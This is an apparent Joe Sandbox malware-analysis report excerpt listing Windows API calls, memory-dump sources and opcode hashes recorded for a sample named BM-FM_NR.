                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                      • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                      • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                      • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                      • GetLastError.KERNEL32 ref: 0040549F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                      • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                      • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                      • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID:
                                                                      • API String ID: 2111968516-0
                                                                      • Opcode ID: 43e8526685af10c7a70099ac688fd15d9e428af537d247d71629121192087908
                                                                      • Instruction ID: 63d8cf605c3d3826413663d3d9f5e538fe035c7b3cf6c49c1bd82217496ef320
                                                                      • Opcode Fuzzy Hash: 43e8526685af10c7a70099ac688fd15d9e428af537d247d71629121192087908
                                                                      • Instruction Fuzzy Hash: 0F210870C04299BEDF318B584A885AFBF749F11308F1480BBE891B62D1C1BD8A81EF1D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                        • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                      • Instruction ID: a9483199a9c1f24fdd03f346660dbac79c1e67f8a05fdc412783a5a7fba403a9
                                                                      • Opcode Fuzzy Hash: 764acf2aeb277f9e06bdeffef5fa042cff7d54f69f19df9b32342fbbe382f709
                                                                      • Instruction Fuzzy Hash: BCE04F76A04100ABF701FBA6AE49DBF776ADB50318B60453BF601F10C1D67D89069A3E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: PathSearch
                                                                      • String ID:
                                                                      • API String ID: 2203818243-0
                                                                      • Opcode ID: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                      • Instruction ID: c7ce876e5ad96af4d980a0e505f4bdb0f2e6b31a9f033159e1f135e3aabe3218
                                                                      • Opcode Fuzzy Hash: 342f1d8797400d1def45ae1f8570d4d2e76e844b62760f1e711b9a1a45a0c132
                                                                      • Instruction Fuzzy Hash: 3DE0D872204100ABE300DB549D48FAA3758DB10368F304537F201A60C1D2B499459639
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(00000000,000001C9,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                      • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                      • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                      • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                      • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                      • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                      • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                      • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                      • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                      • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: ecbda0029c53e9a4e579cc28c48ab42295baff6aa2cc43667ddc013ae829b51b
                                                                      • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                      • Opcode Fuzzy Hash: ecbda0029c53e9a4e579cc28c48ab42295baff6aa2cc43667ddc013ae829b51b
                                                                      • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageA.USER32(000103D4,00000000,00000000,00000000), ref: 00403F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                      • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                      • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                      • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                      • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                      • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                      • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403D13), ref: 00403F40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                      • Instruction ID: 0d109c2b2df33cddb2fdb4737f0edb640fcb727031da007fe45ed195bb05a301
                                                                      • Opcode Fuzzy Hash: 30d96cd9fc0d8ad999d68dc10700da8fc20303459ddb892013b18747b66c33f5
                                                                      • Instruction Fuzzy Hash: 57A012314041009BCB015B10DF04C097F61A750300B054430E1044403482310820FF09
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
